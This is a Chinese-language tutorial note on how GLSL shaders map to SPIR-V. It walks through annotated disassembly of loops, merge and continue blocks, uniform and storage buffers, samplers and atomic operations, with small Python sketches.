SPIR-V 中的控制流结构使用特殊的操作码（如 OpSelectionMerge、OpLoopMerge）来定义。这些操作码告诉编译器如何解释控制流图（Control Flow Graph，CFG）。Merge Block 用于表示这些控制流结构的结束位置，它是控制流从不同路径重新合并到一条路径的地方。例如，一个 if-else 语句会有两个分支，这两个分支在 Merge Block 之后合并为单个执行路径。

while 循环 - 无 break

int testWhile(int count) {
    int sum = 0;
    while (count >= 0) {
        sum++;
        count--;
    }
    return sum;
}

%testWhile_i1_ = OpFunction %int None %27
      %count = OpFunctionParameter %_ptr_Function_int
         %30 = OpLabel
        %sum = OpVariable %_ptr_Function_int Function
               OpStore %sum %int_0
               OpBranch %85
         %85 = OpLabel
               OpLoopMerge %87 %88 None                 ; Declare a structured loop.
                                                        ; This instruction must immediately precede
                                                        ; either an OpBranch or OpBranchConditional 
                                                        ; instruction. 
                                                        ; That is, it must be the second-to-last 
                                                        ; instruction in its block.
                                                        ; Merge Block = %87
                                                        ; Continue target = %88
               OpBranch %89
         %89 = OpLabel
         %90 = OpLoad %int %count
         %91 = OpSGreaterThanEqual %bool %90 %int_0     ; 有符号比较; if %90 (=count) >= %int_0 (0)
               OpBranchConditional %91 %86 %87          ; %91 == true ? jump to %86 : jump to %87 (FINISH)
         %86 = OpLabel
         %92 = OpLoad %int %sum
         %93 = OpIAdd %int %92 %int_1
               OpStore %sum %93                         ; sum = sum + 1
         %94 = OpLoad %int %count
         %95 = OpISub %int %94 %int_1
               OpStore %count %95                       ; count = count - 1
               OpBranch %88
         %88 = OpLabel
               OpBranch %85                             ; 无条件回到 Loop 头
         %87 = OpLabel
         %96 = OpLoad %int %sum
               OpReturnValue %96
               OpFunctionEnd

This amounts to translating the loop into SPIR-V of the following shape:

 %loop_header = OpLabel
                OpLoopMerge %loop_merge %loop_cont None
                OpBranch %loop_test

   %loop_test = OpLabel
   %loop_cond = ...          ; Some calculations
                OpBranchConditional %loop_cond %loop_body %loop_merge
   
   %loop_body = OpLabel
                ...          ; Some codes inside loop body
                OpBranch %loop_cont

   %loop_cont = OpLabel
                OpBranch %loop_header

  %loop_merge = OpLabel
                ...          ; The "following" basic block

while 循环 - 带 break

int testWhile(int count) {
    int sum = 0;
    while (count >= 0) {
        sum++;
        count--;
        if (count == 2) {
            break;
        }
    }
    return sum;
}

SPIR-V 反汇编：

%testWhile_i1_ = OpFunction %int None %27
      %count = OpFunctionParameter %_ptr_Function_int
         %30 = OpLabel
        %sum = OpVariable %_ptr_Function_int Function
               OpStore %sum %int_0
               OpBranch %85

         %85 = OpLabel
               OpLoopMerge %87 %88 None
               OpBranch %89

         %89 = OpLabel
         %90 = OpLoad %int %count
         %91 = OpSGreaterThanEqual %bool %90 %int_0
               OpBranchConditional %91 %86 %87

         %86 = OpLabel
         %92 = OpLoad %int %sum
         %93 = OpIAdd %int %92 %int_1
               OpStore %sum %93
         %94 = OpLoad %int %count
         %95 = OpISub %int %94 %int_1
               OpStore %count %95
         %96 = OpLoad %int %count
         %97 = OpIEqual %bool %96 %int_2
               OpSelectionMerge %99 None              ; If 的 Merge Block = %99
               OpBranchConditional %97 %98 %99

         %98 = OpLabel
               OpBranch %87                           ; => break out of the loop => emit instruction
                                                      ;    to branch to while's merge block

         %99 = OpLabel                                ; normal path => reached the end of the while body => emit a branch
               OpBranch %88                           ; to the while loop's Continue Block

         %88 = OpLabel                                ; Continue Block 
               OpBranch %85

         %87 = OpLabel                                ; Merge Block
        %101 = OpLoad %int %sum
               OpReturnValue %101
               OpFunctionEnd

Summary:

A break ends its basic block, so the compiler simply emits an unconditional branch to the while loop's merge block.
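
The rule above can be sketched as a toy code generator. This is a minimal Python sketch under stated assumptions, not glslang's actual implementation: `LoopEmitter`, its label names, and the string output are all hypothetical, and the loop condition is passed in as an already computed id. The emitter keeps a stack of (merge, continue) labels, so a `break` only needs the innermost entry.

```python
class LoopEmitter:
    """Toy structured control-flow emitter (illustrative names only)."""

    def __init__(self):
        self.lines = []
        self.loop_stack = []      # innermost loop last: (merge, continue)
        self.counter = 0
        self.terminated = False   # True once the current block has a terminator

    def new_label(self, hint):
        self.counter += 1
        return f"%{hint}_{self.counter}"

    def emit(self, text):
        self.lines.append(text)

    def start_block(self, label):
        self.emit(f"{label} = OpLabel")
        self.terminated = False

    def branch(self, target):
        self.emit(f"OpBranch {target}")
        self.terminated = True

    def emit_while(self, cond_id, emit_body):
        header, test, body, cont, merge = (
            self.new_label(h)
            for h in ("header", "test", "body", "continue", "merge")
        )
        self.branch(header)
        self.start_block(header)
        self.emit(f"OpLoopMerge {merge} {cont} None")
        self.branch(test)
        self.start_block(test)
        self.emit(f"OpBranchConditional {cond_id} {body} {merge}")
        self.start_block(body)
        self.loop_stack.append((merge, cont))
        emit_body(self)
        self.loop_stack.pop()
        if not self.terminated:   # normal path falls through to the continue block
            self.branch(cont)
        self.start_block(cont)
        self.branch(header)
        self.start_block(merge)

    def emit_if(self, cond_id, emit_then):
        then, merge = self.new_label("then"), self.new_label("if_merge")
        self.emit(f"OpSelectionMerge {merge} None")
        self.emit(f"OpBranchConditional {cond_id} {then} {merge}")
        self.start_block(then)
        emit_then(self)
        if not self.terminated:
            self.branch(merge)
        self.start_block(merge)

    def emit_break(self):
        merge, _ = self.loop_stack[-1]
        self.branch(merge)        # break: jump straight to the loop's merge block


def loop_body(e):
    e.emit("; ... loop body ...")
    e.emit_if("%is_two", lambda inner: inner.emit_break())


emitter = LoopEmitter()
emitter.emit_while("%cond", loop_body)
listing = emitter.lines
```

Printing `"\n".join(listing)` gives a block order that mirrors the disassembly above: header, test, body, the if's then-block ending in a branch to the loop merge block, the if's merge block branching to the continue block, and finally the loop merge block.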

for loop

GLSL code:

int testFor(int count) {
    int sum = 0;
    for (int i = 0; i < count; i++) {
        sum += 1;
    }
    return sum;
}

SPIR-V disassembly:

%testFor_i1_ = OpFunction %int None %27
    %count_0 = OpFunctionParameter %_ptr_Function_int

         %33 = OpLabel
      %sum_0 = OpVariable %_ptr_Function_int Function
          %i = OpVariable %_ptr_Function_int Function
               OpStore %sum_0 %int_0
               OpStore %i %int_0
               OpBranch %109

        %109 = OpLabel
               OpLoopMerge %111 %112 None
               OpBranch %113

        %113 = OpLabel
        %114 = OpLoad %int %i
        %115 = OpLoad %int %count_0
        %116 = OpSLessThan %bool %114 %115
               OpBranchConditional %116 %110 %111

        %110 = OpLabel
        %117 = OpLoad %int %sum_0
        %118 = OpIAdd %int %117 %int_1
               OpStore %sum_0 %118
               OpBranch %112

        %112 = OpLabel                              ; Continue Block
        %119 = OpLoad %int %i                       ; the for loop's per-iteration update (i++) is placed here
        %120 = OpIAdd %int %119 %int_1
               OpStore %i %120
               OpBranch %109

        %111 = OpLabel                              ; Merge Block
        %121 = OpLoad %int %sum_0
               OpReturnValue %121
               OpFunctionEnd

Summary:

The Continue Block now holds the loop's post-iteration update code (here, i++).
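
One way to see why the update lives in the Continue Block is to walk the block graph by hand. The Python sketch below simulates the blocks of the `testFor` example as a small state machine. The `skip_value` parameter is a hypothetical addition (it is not in the GLSL above) that models a `continue;` statement: because `continue` jumps to the Continue Block, `i++` still runs and the loop terminates.

```python
def run_for_loop(count, skip_value=None):
    """Simulate `for (i = 0; i < count; i++) sum += 1;` block by block.

    skip_value models a hypothetical `if (i == skip_value) continue;`
    at the top of the loop body.
    """
    i, total = 0, 0
    block = "header"
    trace = []
    while block != "merge":
        trace.append(block)
        if block == "header":        # OpLoopMerge + OpBranch to the test block
            block = "test"
        elif block == "test":        # OpBranchConditional body / merge
            block = "body" if i < count else "merge"
        elif block == "body":
            if i != skip_value:
                total += 1           # sum += 1
            block = "continue"       # both paths end up in the continue block
        elif block == "continue":
            i += 1                   # the i++ of the for statement
            block = "header"         # back edge
    return total, trace
```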

Variables in other scopes: Uniform, BuiltIn, etc.

OpSource, OpName, and OpMemberName are debug information.

#version 310 es
precision highp float;
precision highp int;
precision mediump sampler3D;

// Anonymous uniform block - Import member names to shader directly
layout(binding = 0) uniform uniBlock {
    uniform vec3 lightPos;
    uniform float someOtherFloat;
};

layout(location = 0) out vec4 outColor;
layout(location = 0) in vec4 vertColor;

// This will not work:
// layout(binding = 0) uniform vec3 lightPos;
//  'non-opaque uniforms outside a block' : not allowed when using GLSL for Vulkan 

void mainImage(out vec4 c, in vec2 f, in vec3 lightPos) {}
void main() {mainImage(outColor, gl_FragCoord.xy, lightPos);}

Input / Output

For the full list of Decorations, see https://registry.khronos.org/SPIR-V/specs/unified1/SPIRV.html#Decoration

For gl_FragCoord:

                      OpName %gl_FragCoord "gl_FragCoord"
                      OpDecorate %gl_FragCoord BuiltIn FragCoord
%_ptr_Input_v4float = OpTypePointer Input %v4float
      %gl_FragCoord = OpVariable %_ptr_Input_v4float Input

For an Input Variable:

                      OpName %vertColor "vertColor"
                      OpDecorate %vertColor Location 0
%_ptr_Input_v4float = OpTypePointer Input %v4float
         %vertColor = OpVariable %_ptr_Input_v4float Input

For an Output Variable:

                       OpName %outColor "outColor"
                       OpDecorate %outColor Location 0
%_ptr_Output_v4float = OpTypePointer Output %v4float
           %outColor = OpVariable %_ptr_Output_v4float Output

To use these variables, a plain OpLoad is enough (an Output variable is written with OpStore).

Uniform Block (Anonymous)

For an anonymous Uniform Block, the members are brought into the global scope.

It can serve as a drop-in replacement for OpenGL's uniforms outside a block.

               OpName %uniBlock "uniBlock"
               OpMemberName %uniBlock 0 "lightPos"
               OpMemberName %uniBlock 1 "someOtherFloat"
               OpName %_ ""
               OpMemberDecorate %uniBlock 0 Offset 0             ; Structure type = %uniBlock
                                                                 ; Member = 0
                                                                 ; Decoration = Offset
                                                                 ; Byte Offset = 0
               OpMemberDecorate %uniBlock 1 Offset 12
               OpDecorate %uniBlock Block                        ; Apply only to a structure type to establish
                                                                 ; it is a memory interface block
               OpDecorate %_ DescriptorSet 0                     ; Apply only to a variable. 
                                                                 ; Descriptor Set is an unsigned 32-bit integer 
                                                                 ; forming part of the linkage between the client
                                                                 ; API and SPIR-V memory buffers, images, etc. 
                                                                 ; See the client API specification for more detail.
               OpDecorate %_ Binding 0                           ; Apply only to a variable.
                                                                 ; Binding Point is an unsigned 32-bit integer
                                                                 ; forming part of the linkage between the client
                                                                 ; API and SPIR-V memory buffers, images, etc.
                                                                 ; See the client API specification for more detail.
   %uniBlock = OpTypeStruct %v3float %float                      ; The types of all members follow; here {vec3, float}
%_ptr_Uniform_uniBlock = OpTypePointer Uniform %uniBlock         ; Storage Class = Uniform
          %_ = OpVariable %_ptr_Uniform_uniBlock Uniform
%_ptr_Uniform_v3float = OpTypePointer Uniform %v3float

         %34 = OpAccessChain %_ptr_Uniform_v3float %_ %int_0     ; Create a pointer into a composite object.
                                                                 ; Base = %_, Indexes = {%int_0}
                                                                 ; Each index in Indexes
                                                                 ; - must have a scalar integer type
                                                                 ; - is treated as signed
                                                                 ; - if indexing into a structure, must be an 
                                                                 ;   OpConstant whose value is in bounds for selecting a member
                                                                 ; - if indexing into a vector, array, or matrix, 
                                                                 ;   with the result type being a logical pointer type,
                                                                 ;   causes undefined behavior if not in bounds.
         %35 = OpLoad %v3float %34

Uniform Block (Named)

Give the anonymous Uniform Block of type uniform uniBlock from the example program above an instance name:

layout(binding=0) uniform uniBlock {
    uniform vec3 lightPos;
    uniform float someOtherFloat;
} uniInst;

// ..skip some lines..
void main() {mainImage(outColor, gl_FragCoord.xy, uniInst.lightPos);}

The relevant SPIR-V is:

               OpName %uniInst "uniInst"
               OpDecorate %gl_FragCoord BuiltIn FragCoord
               OpMemberDecorate %uniBlock 0 Offset 0
               OpMemberDecorate %uniBlock 1 Offset 12
               OpDecorate %uniBlock Block
               OpDecorate %uniInst DescriptorSet 0
               OpDecorate %uniInst Binding 0
   %uniBlock = OpTypeStruct %v3float %float
%_ptr_Uniform_uniBlock = OpTypePointer Uniform %uniBlock
    %uniInst = OpVariable %_ptr_Uniform_uniBlock Uniform
%_ptr_Uniform_v3float = OpTypePointer Uniform %v3float
         %34 = OpAccessChain %_ptr_Uniform_v3float %uniInst %int_0
         %35 = OpLoad %v3float %34

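As you can see, the main difference is that %_ became %uniInst. In other words, the OpName changed from "" to "uniInst", which merely makes the output of SPIR-V disassemblers easier to read. The actual logical relationships, such as the Result IDs, are unchanged.

That said, I don't know whether reflection libraries rely on OpName. Even with it stripped, reflection is still possible: as long as the layout matches, you can simply bind the data as-is.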

Sampler

GLSL source:

#version 450

layout (binding = 1) uniform sampler2D samplerColor;
layout (binding = 2) uniform texture2D tex;
layout (binding = 3) uniform sampler samp;
layout (location = 0) in vec2 inUV;
layout (location = 1) in float inLodBias;
layout (location = 0) out vec4 outFragColor;

void main() 
{
    vec4 color = texture(samplerColor, inUV, inLodBias);
    vec4 color2 = texture(sampler2D(tex, samp), inUV, inLodBias);
    outFragColor = color + color2;
}

SPIR-V disassembly:

; SPIR-V
; Version: 1.0
; Generator: Khronos Glslang Reference Front End; 10
; Bound: 40
; Schema: 0
               OpCapability Shader
          %1 = OpExtInstImport "GLSL.std.450"
               OpMemoryModel Logical GLSL450
               OpEntryPoint Fragment %main "main" %inUV %inLodBias %outFragColor
               OpExecutionMode %main OriginUpperLeft
               OpSource GLSL 450
               OpName %main "main"
               OpName %color "color"
               OpName %samplerColor "samplerColor"
               OpName %inUV "inUV"
               OpName %inLodBias "inLodBias"
               OpName %color2 "color2"
               OpName %tex "tex"
               OpName %samp "samp"
               OpName %outFragColor "outFragColor"
               OpDecorate %samplerColor DescriptorSet 0
               OpDecorate %samplerColor Binding 1
               OpDecorate %inUV Location 0
               OpDecorate %inLodBias Location 1
               OpDecorate %tex DescriptorSet 0
               OpDecorate %tex Binding 2
               OpDecorate %samp DescriptorSet 0
               OpDecorate %samp Binding 3
               OpDecorate %outFragColor Location 0
       %void = OpTypeVoid
          %3 = OpTypeFunction %void
      %float = OpTypeFloat 32
    %v4float = OpTypeVector %float 4
%_ptr_Function_v4float = OpTypePointer Function %v4float
         %10 = OpTypeImage %float 2D 0 0 0 1 Unknown
         %11 = OpTypeSampledImage %10
%_ptr_UniformConstant_11 = OpTypePointer UniformConstant %11
%samplerColor = OpVariable %_ptr_UniformConstant_11 UniformConstant
    %v2float = OpTypeVector %float 2
%_ptr_Input_v2float = OpTypePointer Input %v2float
       %inUV = OpVariable %_ptr_Input_v2float Input
%_ptr_Input_float = OpTypePointer Input %float
  %inLodBias = OpVariable %_ptr_Input_float Input
%_ptr_UniformConstant_10 = OpTypePointer UniformConstant %10
        %tex = OpVariable %_ptr_UniformConstant_10 UniformConstant
         %27 = OpTypeSampler
%_ptr_UniformConstant_27 = OpTypePointer UniformConstant %27
       %samp = OpVariable %_ptr_UniformConstant_27 UniformConstant
%_ptr_Output_v4float = OpTypePointer Output %v4float
%outFragColor = OpVariable %_ptr_Output_v4float Output

       %main = OpFunction %void None %3
          %5 = OpLabel
      %color = OpVariable %_ptr_Function_v4float Function
     %color2 = OpVariable %_ptr_Function_v4float Function
         %14 = OpLoad %11 %samplerColor
         %18 = OpLoad %v2float %inUV
         %21 = OpLoad %float %inLodBias
         %22 = OpImageSampleImplicitLod %v4float %14 %18 Bias %21
               OpStore %color %22
         %26 = OpLoad %10 %tex
         %30 = OpLoad %27 %samp
         %31 = OpSampledImage %11 %26 %30
         %32 = OpLoad %v2float %inUV
         %33 = OpLoad %float %inLodBias
         %34 = OpImageSampleImplicitLod %v4float %31 %32 Bias %33
               OpStore %color2 %34
         %37 = OpLoad %v4float %color
         %38 = OpLoad %v4float %color2
         %39 = OpFAdd %v4float %37 %38
               OpStore %outFragColor %39
               OpReturn
               OpFunctionEnd

Summary:

Sampler (VK_DESCRIPTOR_TYPE_SAMPLER)

OpName %samp "samp"
OpDecorate %samp DescriptorSet 0
OpDecorate %samp Binding 3

%27 = OpTypeSampler
%_ptr_UniformConstant_27 = OpTypePointer UniformConstant %27
%samp = OpVariable %_ptr_UniformConstant_27 UniformConstant

Sampled Image (VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE)

OpName %tex "tex"
OpDecorate %tex DescriptorSet 0
OpDecorate %tex Binding 2

%10 = OpTypeImage %float 2D 0 0 0 1 Unknown
%_ptr_UniformConstant_10 = OpTypePointer UniformConstant %10
%tex = OpVariable %_ptr_UniformConstant_10 UniformConstant

; Usage
%26 = OpLoad %10 %tex
%30 = OpLoad %27 %samp
%31 = OpSampledImage %11 %26 %30
%32 = OpLoad %v2float %inUV
%33 = OpLoad %float %inLodBias
%34 = OpImageSampleImplicitLod %v4float %31 %32 Bias %33

Combined Image Sampler (VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER)

OpName %samplerColor "samplerColor"
OpDecorate %samplerColor DescriptorSet 0
OpDecorate %samplerColor Binding 1

%10 = OpTypeImage %float 2D 0 0 0 1 Unknown
%11 = OpTypeSampledImage %10
%_ptr_UniformConstant_11 = OpTypePointer UniformConstant %11
%samplerColor = OpVariable %_ptr_UniformConstant_11 UniformConstant

; Usage
%14 = OpLoad %11 %samplerColor
%18 = OpLoad %v2float %inUV
%21 = OpLoad %float %inLodBias
%22 = OpImageSampleImplicitLod %v4float %14 %18 Bias %21

Note the special rules for OpImage and OpSampledImage:

All OpSampledImage instructions must be in the same block in which their Result <id> are consumed. Result <id> from OpSampledImage instructions must not appear as operands to OpPhi instructions or OpSelect instructions, or any instructions other than the image lookup and query instructions specified to take an operand whose type is OpTypeSampledImage.

This requirement is handled in spvtools::opt::InstrumentPass::MovePreludeCode @ source/opt/instrument_pass.cpp (SPIRV-Tools).
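
The operand list `2D 0 0 0 1 Unknown` in the `OpTypeImage` lines above is easier to read with names attached. The following Python sketch splits one disassembly line into the operands defined by the SPIR-V specification (Sampled Type, Dim, Depth, Arrayed, MS, Sampled, Image Format). The function name and the returned dictionary are hypothetical helpers for illustration; this is a text-level toy, not a SPIR-V parser.

```python
IMAGE_OPERANDS = ("sampled_type", "dim", "depth", "arrayed", "ms", "sampled", "format")

# Only the three cases that appear in this section. An OpTypeImage maps to a
# sampled image only when Sampled == 1 and Dim is not Buffer or SubpassData.
DESCRIPTOR_TYPES = {
    "OpTypeSampler": "VK_DESCRIPTOR_TYPE_SAMPLER",
    "OpTypeImage": "VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE",
    "OpTypeSampledImage": "VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER",
}


def parse_op_type_image(line):
    """Split '%id = OpTypeImage ...' into named operands."""
    lhs, rhs = line.split("=", 1)
    tokens = rhs.split()
    if tokens[0] != "OpTypeImage":
        raise ValueError("not an OpTypeImage instruction")
    fields = dict(zip(IMAGE_OPERANDS, tokens[1:]))
    for key in ("depth", "arrayed", "ms", "sampled"):
        fields[key] = int(fields[key])
    fields["result_id"] = lhs.strip()
    return fields


info = parse_op_type_image("%10 = OpTypeImage %float 2D 0 0 0 1 Unknown")
```

Here `info["sampled"] == 1` means the image is used together with a sampler, which is why `%tex` needs `OpSampledImage` before it can be passed to `OpImageSampleImplicitLod`.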

Storage Buffer

14.1.7. Storage Buffer

One thing that puzzled me:

// Does not compile: an unsized array must be the last member of the block
layout(std430, set = 1, binding = 0) readonly buffer objectBufferType {
    float someBeginningVar;
    ObjectData objects[]; 
    float someEndingVar;
} objectBuffer;

// Works; see the example at
// https://github.com/KhronosGroup/SPIRV-Guide/blob/master/chapters/access_chains.md
layout(std430, set = 1, binding = 0) readonly buffer objectBufferType {
    float someBeginningVar;
    ObjectData objects[];
} objectBuffer;

// (Should) compile
layout(std430, set = 1, binding = 0) readonly buffer objectBufferType {
    float someBeginningVar;
} objectBuffer;

GLSL source:

#version 450

layout (location = 0) out vec4 outFragColor;

struct ObjectData {
    vec4 model;
    float moreData;
    vec4 padThis;
};

struct WritableData {
    float testData;
};

// std430 vs std140: https://www.khronos.org/opengl/wiki/Interface_Block_(GLSL)
layout(std430, set = 1, binding = 0) readonly buffer objectBufferType {
    ObjectData objects[];
} objectBuffer;

layout(std430, set = 1, binding = 1) buffer myWritableBufferType {
    WritableData datas[];
} writableBuffer;

void main() 
{
    int index = int(gl_FragCoord.x * 1000);
    outFragColor = objectBuffer.objects[index].model;
    writableBuffer.datas[index].testData = 123;
}

SPIR-V disassembly:

; SPIR-V
; Version: 1.0
; Generator: Khronos Glslang Reference Front End; 10
; Bound: 42
; Schema: 0
               OpCapability Shader
          %1 = OpExtInstImport "GLSL.std.450"
               OpMemoryModel Logical GLSL450
               OpEntryPoint Fragment %main "main" %gl_FragCoord %outFragColor
               OpExecutionMode %main OriginUpperLeft
               OpSource GLSL 450
               OpName %main "main"
               OpName %index "index"
               OpName %gl_FragCoord "gl_FragCoord"
               OpName %outFragColor "outFragColor"
               OpName %ObjectData "ObjectData"
               OpMemberName %ObjectData 0 "model"
               OpMemberName %ObjectData 1 "moreData"
               OpMemberName %ObjectData 2 "padThis"
               OpName %objectBufferType "objectBufferType"
               OpMemberName %objectBufferType 0 "objects"
               OpName %objectBuffer "objectBuffer"
               OpName %WritableData "WritableData"
               OpMemberName %WritableData 0 "testData"
               OpName %myWritableBufferType "myWritableBufferType"
               OpMemberName %myWritableBufferType 0 "datas"
               OpName %writableBuffer "writableBuffer"
               OpDecorate %gl_FragCoord BuiltIn FragCoord
               OpDecorate %outFragColor Location 0
               OpMemberDecorate %ObjectData 0 Offset 0
               OpMemberDecorate %ObjectData 1 Offset 16
               OpMemberDecorate %ObjectData 2 Offset 32
               OpDecorate %_runtimearr_ObjectData ArrayStride 48
               OpMemberDecorate %objectBufferType 0 NonWritable
               OpMemberDecorate %objectBufferType 0 Offset 0
               OpDecorate %objectBufferType BufferBlock
               OpDecorate %objectBuffer DescriptorSet 1
               OpDecorate %objectBuffer Binding 0
               OpMemberDecorate %WritableData 0 Offset 0
               OpDecorate %_runtimearr_WritableData ArrayStride 4
               OpMemberDecorate %myWritableBufferType 0 Offset 0
               OpDecorate %myWritableBufferType BufferBlock
               OpDecorate %writableBuffer DescriptorSet 1
               OpDecorate %writableBuffer Binding 1
       %void = OpTypeVoid
          %3 = OpTypeFunction %void
        %int = OpTypeInt 32 1
%_ptr_Function_int = OpTypePointer Function %int
      %float = OpTypeFloat 32
    %v4float = OpTypeVector %float 4
%_ptr_Input_v4float = OpTypePointer Input %v4float
%gl_FragCoord = OpVariable %_ptr_Input_v4float Input
       %uint = OpTypeInt 32 0
     %uint_0 = OpConstant %uint 0
%_ptr_Input_float = OpTypePointer Input %float
 %float_1000 = OpConstant %float 1000
%_ptr_Output_v4float = OpTypePointer Output %v4float
%outFragColor = OpVariable %_ptr_Output_v4float Output
 %ObjectData = OpTypeStruct %v4float %float %v4float
%_runtimearr_ObjectData = OpTypeRuntimeArray %ObjectData
%objectBufferType = OpTypeStruct %_runtimearr_ObjectData
%_ptr_Uniform_objectBufferType = OpTypePointer Uniform %objectBufferType
%objectBuffer = OpVariable %_ptr_Uniform_objectBufferType Uniform
      %int_0 = OpConstant %int 0
%_ptr_Uniform_v4float = OpTypePointer Uniform %v4float
%WritableData = OpTypeStruct %float
%_runtimearr_WritableData = OpTypeRuntimeArray %WritableData
%myWritableBufferType = OpTypeStruct %_runtimearr_WritableData
%_ptr_Uniform_myWritableBufferType = OpTypePointer Uniform %myWritableBufferType
%writableBuffer = OpVariable %_ptr_Uniform_myWritableBufferType Uniform
  %float_123 = OpConstant %float 123
%_ptr_Uniform_float = OpTypePointer Uniform %float

       %main = OpFunction %void None %3
          %5 = OpLabel
      %index = OpVariable %_ptr_Function_int Function
         %16 = OpAccessChain %_ptr_Input_float %gl_FragCoord %uint_0
         %17 = OpLoad %float %16
         %19 = OpFMul %float %17 %float_1000
         %20 = OpConvertFToS %int %19
               OpStore %index %20
         %29 = OpLoad %int %index
         %31 = OpAccessChain %_ptr_Uniform_v4float %objectBuffer %int_0 %29 %int_0
         %32 = OpLoad %v4float %31
               OpStore %outFragColor %32
         %38 = OpLoad %int %index
         %41 = OpAccessChain %_ptr_Uniform_float %writableBuffer %int_0 %38 %int_0
               OpStore %41 %float_123
               OpReturn
               OpFunctionEnd

Summary:

               OpName %ObjectData "ObjectData"
               OpMemberName %ObjectData 0 "model"
               OpMemberName %ObjectData 1 "moreData"
               OpMemberName %ObjectData 2 "padThis"

               OpName %objectBufferType "objectBufferType"
               OpMemberName %objectBufferType 0 "objects"
               OpName %objectBuffer "objectBuffer"
               OpMemberDecorate %ObjectData 0 Offset 0
               OpMemberDecorate %ObjectData 1 Offset 16
               OpMemberDecorate %ObjectData 2 Offset 32
               OpDecorate %_runtimearr_ObjectData ArrayStride 48
               OpMemberDecorate %objectBufferType 0 NonWritable    ; absent if the buffer is writable
               OpMemberDecorate %objectBufferType 0 Offset 0
               OpDecorate %objectBufferType BufferBlock
               OpDecorate %objectBuffer DescriptorSet 1
               OpDecorate %objectBuffer Binding 0
 %ObjectData = OpTypeStruct %v4float %float %v4float
%_runtimearr_ObjectData = OpTypeRuntimeArray %ObjectData           ; Declare a new run-time array type.
                                                                   ; Its length is not known at compile time.
                                                                   ; See OpArrayLength for getting the Length
                                                                   ; of an array of this type.
%objectBufferType = OpTypeStruct %_runtimearr_ObjectData
%_ptr_Uniform_objectBufferType = OpTypePointer Uniform %objectBufferType
%objectBuffer = OpVariable %_ptr_Uniform_objectBufferType Uniform

; Access
; Uses the OpAccessChain instruction, whose operands are: base, indices...
; In this example: objectBuffer[0][index][0] yields a pointer to model, which can then be used for load / store
         %29 = OpLoad %int %index
         %31 = OpAccessChain %_ptr_Uniform_v4float %objectBuffer %int_0 %29 %int_0
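
The `Offset` and `ArrayStride` decorations above can be reproduced by hand. The Python sketch below applies the std430 rules to structs made only of scalars and vectors; the table `TYPE_INFO` and the function names are hypothetical, and matrices, arrays inside structs, and nested structs are deliberately left out. Under std140 the member offsets of these examples are the same, but a struct's alignment is additionally rounded up to 16 bytes.

```python
# (size, base alignment) in bytes; a vec3 occupies 12 bytes but aligns to 16.
TYPE_INFO = {
    "float": (4, 4),
    "int": (4, 4),
    "vec2": (8, 8),
    "vec3": (12, 16),
    "vec4": (16, 16),
}


def round_up(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def layout_struct(member_types):
    """Return (member offsets, struct size) under std430 for scalars/vectors."""
    offsets = []
    cursor = 0
    struct_align = 1
    for type_name in member_types:
        size, align = TYPE_INFO[type_name]
        cursor = round_up(cursor, align)   # place the member at its alignment
        offsets.append(cursor)
        cursor += size
        struct_align = max(struct_align, align)
    # The struct size is padded to its largest member alignment; this padded
    # size is what becomes the ArrayStride of an array of such structs.
    return offsets, round_up(cursor, struct_align)


object_data = layout_struct(["vec4", "float", "vec4"])   # ObjectData
writable_data = layout_struct(["float"])                 # WritableData
uni_block = layout_struct(["vec3", "float"])             # uniBlock from earlier
```

The results match the listings: `ObjectData` gets offsets 0 / 16 / 32 and stride 48, `WritableData` gets stride 4, and the `float` after the `vec3` in `uniBlock` lands at offset 12.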

Atomic operations

https://github.com/KhronosGroup/Vulkan-Guide/blob/main/chapters/atomics.adoc

GLSL source:

#version 450

layout (location = 0) out vec4 outFragColor;

// std430 vs std140: https://www.khronos.org/opengl/wiki/Interface_Block_(GLSL)
layout(std430, set = 1, binding = 0) buffer statsBufferType {
    int totalInvocations;
} statsBuffer;


void main() 
{
    // returns the value before the add
    int globalIdx = atomicAdd(statsBuffer.totalInvocations, 1);
    outFragColor = vec4(1.0);
}

SPIR-V disassembly:

; SPIR-V
; Version: 1.0
; Generator: Khronos Glslang Reference Front End; 10
; Bound: 26
; Schema: 0
               OpCapability Shader
          %1 = OpExtInstImport "GLSL.std.450"
               OpMemoryModel Logical GLSL450
               OpEntryPoint Fragment %main "main" %outFragColor
               OpExecutionMode %main OriginUpperLeft
               OpSource GLSL 450
               OpName %main "main"
               OpName %globalIdx "globalIdx"
               OpName %statsBufferType "statsBufferType"
               OpMemberName %statsBufferType 0 "totalInvocations"
               OpName %statsBuffer "statsBuffer"
               OpName %outFragColor "outFragColor"
               OpMemberDecorate %statsBufferType 0 Offset 0
               OpDecorate %statsBufferType BufferBlock
               OpDecorate %statsBuffer DescriptorSet 1
               OpDecorate %statsBuffer Binding 0
               OpDecorate %outFragColor Location 0
       %void = OpTypeVoid
          %3 = OpTypeFunction %void
        %int = OpTypeInt 32 1
%_ptr_Function_int = OpTypePointer Function %int
%statsBufferType = OpTypeStruct %int
%_ptr_Uniform_statsBufferType = OpTypePointer Uniform %statsBufferType
%statsBuffer = OpVariable %_ptr_Uniform_statsBufferType Uniform
      %int_0 = OpConstant %int 0
%_ptr_Uniform_int = OpTypePointer Uniform %int
      %int_1 = OpConstant %int 1
       %uint = OpTypeInt 32 0
     %uint_1 = OpConstant %uint 1
     %uint_0 = OpConstant %uint 0
      %float = OpTypeFloat 32
    %v4float = OpTypeVector %float 4
%_ptr_Output_v4float = OpTypePointer Output %v4float
%outFragColor = OpVariable %_ptr_Output_v4float Output
    %float_1 = OpConstant %float 1
         %25 = OpConstantComposite %v4float %float_1 %float_1 %float_1 %float_1
       %main = OpFunction %void None %3
          %5 = OpLabel
  %globalIdx = OpVariable %_ptr_Function_int Function
         %14 = OpAccessChain %_ptr_Uniform_int %statsBuffer %int_0
         %19 = OpAtomicIAdd %int %14 %uint_1 %uint_0 %int_1             ; Pointer = %14
                                                                        ; Memory Scope = %uint_1 = 1
                                                                        ; => Scope is the current device
                                                                        ; Semantics = %uint_0 = 0
                                                                        ; => None (relaxed)
                                                                        ; Value = %int_1 = 1
               OpStore %globalIdx %19
               OpStore %outFragColor %25
               OpReturn
               OpFunctionEnd

Memory Scope: https://registry.khronos.org/SPIR-V/specs/unified1/SPIRV.html#Scope_-id-
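
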